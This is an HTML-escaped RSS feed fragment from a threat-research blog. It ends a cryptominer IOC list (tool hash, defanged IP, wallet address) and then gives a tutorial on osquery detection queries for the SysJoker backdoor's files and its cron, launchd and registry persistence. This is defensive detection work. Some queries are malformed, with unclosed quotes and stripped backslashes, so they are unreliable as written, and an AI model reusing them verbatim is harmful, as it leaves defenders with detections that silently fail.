&lt;td&gt;Ensures the miners stay running&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;7f3d989fec5eb1fbce46bce1777266334f385881b2adda6aa73cce238019bceb&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;zgrab&lt;/td&gt;
&lt;td&gt;Port Scanning Tool&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;Network&lt;span class="hx:absolute hx:-mt-20" id="network"&gt;&lt;/span&gt;
&lt;a href="#network" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;code&gt;104.192.82[.]138&lt;/code&gt;&lt;/p&gt;
&lt;h3&gt;Crypto Wallet&lt;span class="hx:absolute hx:-mt-20" id="crypto-wallet"&gt;&lt;/span&gt;
&lt;a href="#crypto-wallet" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;code&gt;85X7JcgPpwQdZXaK2TKJb8baQAXc3zBsnW7JuY7MLi9VYSamf4bFwa7SEAK9Hgp2P53npV19w1zuaK5bft5m2NN71CmNLoh&lt;/code&gt;&lt;/p&gt;</description></item><item><title>Detection Rules for Sysjoker (and How to Make Them With Osquery)</title><link>https://research.intezer.com/blog/2022/01/detection-rules-for-sysjoker-and-how-to-make-them-with-osquery/</link><pubDate>Fri, 14 Jan 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/01/detection-rules-for-sysjoker-and-how-to-make-them-with-osquery/</guid><description>
&lt;p&gt;On January 11, 2022, we released a blog post on a new malware called &lt;a href="../../../2022/01/new-backdoor-sysjoker"&gt;SysJoker&lt;/a&gt;. SysJoker is a malware targeting Windows, macOS, and Linux. At the time of the publication, the Linux and macOS versions were not detected by any scanning engines on VirusTotal. As a consequence to this, we decided to release a followup blog posting showing how the information we released can be used to investigate whether you have been affected.&lt;/p&gt;
&lt;p&gt;There are many tools available to gather system information and to perform threat hunting within an organization. We decided to use &lt;a href="https://osquery.io"target="_blank" rel="noopener"&gt;osquery&lt;/a&gt; in this blog post. The reason for choosing osquery is that it is supported for all the affected operating systems that SysJoker targets and it is open source allowing essentially anyone to follow along in this tutorial.&lt;/p&gt;
&lt;h2&gt;Information Gathering with Osquery&lt;span class="hx:absolute hx:-mt-20" id="information-gathering-with-osquery"&gt;&lt;/span&gt;
&lt;a href="#information-gathering-with-osquery" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Osquery runs as an agent on machines and is designed to provide endpoint visibility in a performant way. The data is collected by the agent and exposed via SQL queries.&lt;/p&gt;
&lt;p&gt;There are two ways of running osquery, as a daemon via osqueryd or interactively via osqueryi. The daemon takes a configuration file where the queries are defined and executes them at a given interval. Data is continuously collected by the daemon and the difference since the last execution is logged to a result log. The interactive binary allows for ad-hoc queries and we will use it in this tutorial to construct queries that can be added to the daemon&amp;rsquo;s configuration. The queries will be added to a &lt;a href="https://osquery.readthedocs.io/en/stable/deployment/configuration/#query-packs"target="_blank" rel="noopener"&gt;query-pack&lt;/a&gt; to make it easier to manage.&lt;/p&gt;
&lt;h3&gt;File Artifacts&lt;span class="hx:absolute hx:-mt-20" id="file-artifacts"&gt;&lt;/span&gt;
&lt;a href="#file-artifacts" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The report highlights files and folders created by the &lt;a href="../../../2022/01/new-backdoor-sysjoker"&gt;SysJoker malware&lt;/a&gt;. We can use these to write hunting or detection queries. Since the Windows version is well detected by antivirus engines and Patrick Wardle released a &lt;a href="https://objective-see.com/blog/blog_0x6C.html"target="_blank" rel="noopener"&gt;great blog post&lt;/a&gt; on how his free macOS security tools can detect the macOS variant, we will put most focus on the Linux variant. Since osquery abstracts the differences between all the operating systems into SQL, the queries we produce for Linux can easily be translated to the other operating systems.&lt;/p&gt;
&lt;p&gt;If we look at the report, we can see that all of the files are created under a folder named &lt;code&gt;/.Library&lt;/code&gt;. This is a very unusual folder that is not expected to exist on a normal Linux install. We can use the osquery table file to monitor for files under this folder. According to the schema for this table, we can get which user created it, when the file was created, modified, and last accessed. To enrich the data, we join the uid with the &lt;a href="https://osquery.io/schema/5.1.0/#users"target="_blank" rel="noopener"&gt;users&lt;/a&gt; table and the gid with the groups table. This allows us to get the username and the group name instead of just the id numbers.&lt;/p&gt;
&lt;p&gt;Another thing that is useful is the file hash for the files. This can be obtained by joining with the hash table on the path. This allow us to construct a query like this:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;groupname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;mtime&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;ctime&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;atime&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;md5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;sha1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;sha256&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;JOIN&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;users&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;using&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;uid&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;JOIN&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;hash&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;using&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;JOIN&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;groups&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;using&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;gid&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;WHERE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;directory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/.Library&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;For macOS we can use the same logic by just changing the directory to the one from the report: &lt;code&gt;/Library/MacOsServices&lt;/code&gt;. This also is not a standard folder.&lt;/p&gt;
&lt;p&gt;On Windows, the malware uses two folders under the hidden ProgramData folder. We can search for files under these two folders. With this information we can create the following queries for our pack. In the pack we are using an interval of 60 seconds.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-json" data-lang="json"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="s2"&gt;&amp;#34;linux-artifacts&amp;#34;&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;query&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;SELECT path, filename, username, groupname, mtime, ctime, atime, md5, sha1, sha256 FROM file
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN users using (uid)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN hash using (path)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN groups using (gid)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; WHERE file.directory in (&amp;#39;/.Library&amp;#39;);&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;interval&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;60&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;1.0.0&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;description&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;https://intezer.com/blog/malware-analysis/new-backdoor-sysjoker/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;platform&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;linux&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;value&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Possible sysjoker Linux files&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="err"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="s2"&gt;&amp;#34;macos-artifacts&amp;#34;&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;query&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;SELECT path, filename, username, groupname, mtime, ctime, atime, md5, sha1, sha256 FROM file
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN users using (uid)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN hash using (path)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN groups using (gid)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; WHERE file.directory in (&amp;#39;/Library/MacOsServices&amp;#39;);&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;interval&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;60&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;1.0.0&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;description&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;https://intezer.com/blog/malware-analysis/new-backdoor-sysjoker/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;platform&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;darwin&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;value&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Possible sysjoker macOS files&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="err"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="s2"&gt;&amp;#34;windows-artifacts&amp;#34;&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;query&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;SELECT path, filename, username, groupname, mtime, ctime, atime, md5, sha1, sha256 FROM file
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN users using (uid)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN hash using (path)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN groups using (gid)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; WHERE file.directory in (&amp;#39;C:\ProgramData\RecoverySystem&amp;#39;, &amp;#39;C:\ProgramData\SystemData&amp;#39;);&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;interval&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;60&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;1.0.0&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;description&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;https://intezer.com/blog/malware-analysis/new-backdoor-sysjoker/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;platform&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;windows&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;value&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Possible sysjoker Windows files&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Persistence&lt;span class="hx:absolute hx:-mt-20" id="persistence"&gt;&lt;/span&gt;
&lt;a href="#persistence" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;If we look at the persistence documented in the report, we can see that it uses different techniques for the different operating systems: cron job on Linux, launchd entry on macOS, and registry run key on Windows. While they are different, luckily osquery has tables for these that can be used.&lt;/p&gt;
&lt;p&gt;The cron job is executed on reboot. This allow us to query the cron table for job that runs at a reboot event with a command including the name of the malware file:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;crontab&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;WHERE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;LIKE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;@reboot&amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AND&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;command&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;LIKE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;%/updateSystem);&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;On macOS we can use the launchd table to query for entries with a similar name to the name used by SysJoker:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;launchd&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;WHERE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;LIKE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;%com.apple.update.plist;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Finally on Windows we can query the registry table for keys similar to the registry key in the report:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;registry&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;WHERE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;key&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;LIKE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun&amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AND&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;igfxCUIService&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
